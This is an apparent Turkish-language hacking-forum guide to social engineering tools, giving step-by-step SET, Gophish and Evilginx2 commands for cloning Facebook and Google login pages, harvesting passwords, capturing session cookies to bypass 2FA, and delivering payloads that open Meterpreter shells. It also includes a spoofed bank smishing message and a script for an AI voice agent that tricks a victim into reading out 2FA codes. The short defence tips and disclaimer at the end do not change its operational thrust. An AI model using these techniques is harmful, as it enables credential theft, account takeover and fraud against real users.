-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🎭 SOSYAL MÜHENDİSLİK ARAÇLARI REHBERİ
🧠 1. GİRİŞ: SOSYAL MÜHENDİSLİK NEDİR?
Sosyal mühendislik, teknolojik zafiyetlerden çok insan psikolojisini hedef alan saldırı türüdür. Karmaşık bir güvenlik duvarını aşmaktansa, bir çalışanı telefonla arayıp şifresini söyletmek çok daha kolaydır. Günümüzde saldırganlar artık sadece e-posta ile değil, telefon (vishing), SMS (smishing), hatta yapay zeka destekli ses sentezi ile hedeflerini kandırmaktadır. Bu rehberde en güncel araçları ve teknikleri adım adım anlatacağım.🎯 2. SOSYAL MÜHENDİSLİK ARAÇLARI
2.1. SET (Social-Engineer Toolkit) – Sektör Standardı
SET, TrustedSec tarafından geliştirilen ve Kali Linux’ta varsayılan olarak bulunan en kapsamlı sosyal mühendislik çatısıdır. Phishing, kimlik bilgisi toplama, zararlı yazılım dağıtma ve daha fazlasını tek bir araçta birleştirir.💡 Kurulum
bash
# Kali'de zaten yüklü, yoksa:
sudo apt update && sudo apt install set -y
# veya GitHub'dan
git clone https://github.com/trustedsec/social-engineer-toolkit
cd social-engineer-toolkit
sudo python setup.py
Adım 1: Web Sitesi Klonlama ve Kimlik Bilgisi Toplama
bash
sudo setoolkit
Simüle edilmiş menü:
text
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
1 tuşuna basın.
text
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
2 tuşuna basın (Website Attack Vectors).
text
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
3 tuşuna basın (Credential Harvester Attack Method).
text
1) Web Templates
2) Site Cloner
3) Custom Import
2 tuşuna basın (Site Cloner). Klonlamak istediğiniz sitenin URL'sini girin (örneğin https://facebook.com) ve yerel IP adresinizi (veya Ngrok ile alınan adresi) yazın.
Simüle edilmiş çıktı:
text
[+] Website Cloner başlatıldı.
[*] https://facebook.com adresi klonlanıyor...
[+] Facebook login sayfası başarıyla klonlandı.
[+] Kimlik avı sunucusu http://192.168.1.100:80 adresinde çalışıyor.
Hedef bu sahte sayfaya e-posta ve şifresini girdiğinde:
text
[*] Waiting for credentials...
[+] Credential captured from 192.168.1.105
Username: [email protected]
Password: SuperSecret123
Adım 2: Zararlı Yazılım (Payload) ile Gerçek Shell
SET, zararlı yazılım oluşturup e-posta ile göndermenizi sağlar.
Ana menüden:
text
1) Social-Engineering Attacks → 1) Spear-Phishing Attack Vectors → 1) Perform a Mass Email Attack
İstenen bilgileri girdikten sonra, SET msfvenom ile bir payload oluşturur ve hedefin e-posta adresine gönderir. Hedef eki çalıştırdığında, Metasploit ile bir shell oturumu açılır.
Simüle edilmiş çıktı (Metasploit):
text
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.50:49168)
meterpreter > sysinfo
Computer : DESKTOP-ABC
OS : Windows 10 (10.0 Build 19045)
2.2. Gophish – Profesyonel Phishing Simülasyon Platformu
Gophish, kurumsal ortamlarda gerçekçi phishing kampanyaları düzenlemek için tasarlanmış açık kaynaklı bir araçtır. Web tabanlı arayüzü sayesinde e-posta şablonları oluşturabilir, kampanyaları başlatabilir ve sonuçları anlık takip edebilirsiniz.💡 Kurulum
bash
# En güncel sürümü indir
wget https://github.com/gophish/gophish/releases/latest/download/gophish-vX.X.X-linux-64bit.zip
unzip gophish-vX.X.X-linux-64bit.zip
cd gophish-vX.X.X-linux-64bit
./gophish
Simüle edilmiş çıktı:
text
time="2026-04-19T10:00:00Z" level=info msg="Starting phishing server at http://0.0.0.0:80"
time="2026-04-19T10:00:00Z" level=info msg="Starting admin server at https://0.0.0.0:3333"
time="2026-04-19T10:00:00Z" level=info msg="Login with username admin and password f3e2d1c0b9a8"
Tarayıcınızdan https://localhost:3333 adresine gidin ve yönetici panelinde oturum açın.
Adım 1: E-posta Gönderim Ayarları (SMTP)
- Profiles bölümüne gidin.
- SMTP sunucusu olarak bir e-posta servisi ekleyin (Google SMTP, SendGrid, kendi sunucunuz).
- Kimlik doğrulama bilgilerini girin.
- Hedef e-posta adreslerini ve isimlerini buraya ekleyin.
- Import Email ile gerçek bir e-posta örneğini (.eml dosyası) içe aktarın.
- HTML editörü ile şablonu düzenleyin. Değiştirilmesi gereken alanları {{.FirstName}} gibi placeholder’larla belirtin.
- Attachment (ek) ekleyebilirsiniz.
- İçe aktarma veya manuel HTML ile bir sayfa oluşturun.
- Sayfa, e-posta ve şifre alanları içermeli ve bir Capture Submitted Data butonu ile verileri toplamalıdır.
- Redirect URL olarak hedefin gerçek sitesine yönlendirme ekleyin.
- URL: Sahte landing page’inizin adresi (Ngrok ile dış dünyaya açılmış adres)
- Launch Date: Kampanyanın başlama zamanı
- Send Profiles: Kullanılacak e-posta gönderim profili
text
Kampanya: "Acil Şifre Sıfırlama" (2026-04-19 10:00)
Toplam Gönderilen E-posta: 124
Açılma Oranı: 67 / 124 (%54)
Linke Tıklama: 42 / 124 (%33)
Veri Gönderen (Kurbanlar): 19 / 124 (%15)
Ngrok ile Kampanyayı İnternete Açma
bash
ngrok http 80
Simüle edilmiş çıktı:
text
Forwarding https://abc123.ngrok.io -> http://localhost:80
Bu HTTPS adresini Gophish kampanyasında kullanarak dış ağdaki hedeflere de saldırabilirsiniz.
2.3. Evilginx2 – 2FA Bypass ile Session Hijacking
Evilginx2, bir reverse proxy çatısıdır. Hedef ile gerçek web sitesi arasına girerek, trafiği dinler ve 2FA kodlarını bile ele geçirir. Session cookie’yi çalarak şifresiz ve 2FA'sız giriş yapabilirsiniz.💡 Kurulum
bash
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo make install
Adım 1: Phishing URL Oluşturma
bash
sudo evilginx2 -p
Simüle edilmiş menü:
text
evilginx2> config domain google-verify.com
evilginx2> config ip 192.168.1.100
evilginx2> lure create google
evilginx2> lure edit google url https://accounts.google.com
evilginx2> lure get-url google
Simüle edilmiş çıktı:
text
[+] Phishing URL: https://accounts.google-verify.com
Adım 2: Session Cookie Yakalama
Hedef bu URL’ye girip giriş yaptığında:
text
[!] New session captured!
IP: 192.168.1.105
Email: [email protected]
Password: MySecretPass
MFA Code: 284739 (Bypassed!)
[+] Session cookie intercepted: __Secure-3PSID=abc123...
2.4. Gelişmiş SMS Spoofing ve Smishing Araçları
SMS üzerinden yapılan sosyal mühendislik saldırılarına smishing denir. 2026'da bu alanda kullanılan en güncel araçlar:| Araç | Açıklama |
|---|---|
| Xeon Sender | Birden fazla SaaS sağlayıcısı üzerinden toplu SMS gönderimi yapar. Kimlik bilgileri çalınmış hesaplar kullanılır. |
| Devil-Traff | Gönderen ID'sini taklit etme (sender ID spoofing) özelliği ile banka veya resmi kurum gibi görünen SMS’ler gönderir. API otomasyonu ile dakikada binlerce SMS atabilir. |
| LSPosed | Rootlu Android cihazlara yüklenen bir framework. Kurbanın cihazına sızan saldırgan, kurbanın numarasından sahte SMS gönderebilir. |
| OTP Bombing | Hedefin telefonunu gerçek servislerin (banka, e-posta) SMS'leri ile doldurarak panik yaratır ve ardından gelen sahte yönlendirme SMS'ine tıklamasını sağlar. |
Saldırgan, Devil-Traff platformu üzerinden "GARANTI" gönderen adı ile bir SMS gönderir:
text
[GARANTI] Hesabınızda şüpheli hareket tespit edilmiştir.
Hesabınızı doğrulamak için lütfen tıklayın:
Hedef linke tıkladığında, sahte banka sayfasına yönlendirilir ve e-posta, şifre ve hatta 2FA kodu girer. Bu bilgiler saldırgana ulaşır.
2.5. Vishing (Sesli Phishing) ve Yapay Zeka Destekli Araçlar
Vishing, telefon görüşmeleri yoluyla bilgi toplamaktır. 2026'da yapay zeka destekli vishing platformları büyük tehdit oluşturmaktadır.ATHR Platformu: Bu platform, tam otomatik AI sesli arama asistanları ve insan operatörlerle çalışır. Hedefi arayarak banka veya destek personeli gibi davranır ve kimlik bilgilerini toplar. Kurulum maliyeti yaklaşık 4.000 dolar artı çalınanların %10'udur.
Ses Klonlama (Voice Cloning): Sadece 30 saniyelik bir ses kaydı ile bir kişinin sesi taklit edilebilir. Saldırgan, üst yöneticinin sesini taklit ederek bir çalışanı arayıp şifre sıfırlama veya para transferi yapmasını isteyebilir.
💡 Vishing Simülasyonu (AI ile):
Saldırgan, ATHR platformunda hedefin telefon numarasını girer ve bir senaryo seçer (örneğin "IT Destek"). AI ajanı hedefi arar:
text
AI (ses): Merhaba, BT departmanından Ahmet Bey ben. Sistemimizde hesabınızla ilgili anormal bir aktivite tespit ettik. Hesabınızı doğrulamak için size bir kod göndereceğim, bana söyler misiniz?
Hedef: Tamam, kod 284739.
AI: Teşekkürler, şimdi başka bir kod daha gelecek...
Bu şekilde, hedefin telefonuna gelen 2FA kodları da ele geçirilir.
2.6. Sahte Arama (Caller ID Spoofing) ve SMS Spoofing
Telefon numarası taklit etmek, vishing saldırılarının vazgeçilmezidir. Saldırgan, kendisini banka, polis veya tanıdık bir numara olarak gösterebilir. Bu teknik VoIP hizmetleri veya özel yazılımlar kullanılarak yapılır.💡 SMS Spoofing Araçları:
| Araç | Açıklama |
|---|---|
| SpoofCard | Ticari bir hizmettir, gönderen numarasını taklit edebilir. |
| SMSCaster | Profesyonel SMS yazılımı, gönderen adını değiştirmeye izin verir. |
| TextMagic | API ile toplu SMS gönderimi, gönderen adı özelleştirilebilir. |
🧪 3. KAPSAMLI KORUNMA YÖNTEMLERİ
Bireysel Kullanıcılar için:- Kimlik Doğrulama: Her zaman çok faktörlü kimlik doğrulama (MFA) kullanın, tercihen donanımsal token veya authenticator uygulaması. SMS tabanlı MFA, vishing saldırılarına karşı zayıftır.
- Şüphecilik: Tanımadığınız kişilerden gelen e-posta, SMS veya aramalarda kişisel bilgilerinizi asla paylaşmayın.
- Link Kontrolü: Linke tıklamadan önce fare ile üzerine gelerek gerçek adresi kontrol edin.
- Güvenlik Yazılımları: Antivirüs ve anti-phishing yazılımları kullanın.
- FIDO2/WebAuthn gibi phishing dirençli MFA yöntemlerine geçin.
- Düzenli phishing simülasyonları (Gophish ile) yaparak çalışanların farkındalığını artırın.
- E-posta filtreleri ve DMARC, DKIM, SPF ayarlarını yapılandırın.
- Acil durum prosedürleri oluşturun. Çalışanlar, şüpheli bir durumda kimi arayacaklarını bilmelidir.
🔚;
Artık sosyal mühendislik saldırılarında kullanılan en güncel araç ve teknikleri biliyorsunuz. SET ile web sitesi klonlayıp kimlik bilgisi toplamaktan, Gophish ile profesyonel phishing kampanyaları yürütmeye, Evilginx2 ile 2FA'yı aşmaya, SMS spoofing ve AI destekli vishing araçlarına kadar geniş bir yelpazede bilgi sahibi oldunuz. Bu bilgileri yalnızca eğitim ve yetkili güvenlik testlerinde kullanın. Unutmayın: Savunması olmayanın saldırısı, sadece intihardır. Bu bilgileri öğrenerek hem kendinizi hem de çevrenizdekileri bu tehditlere karşı daha iyi koruyabilirsiniz.Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz kullanım yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
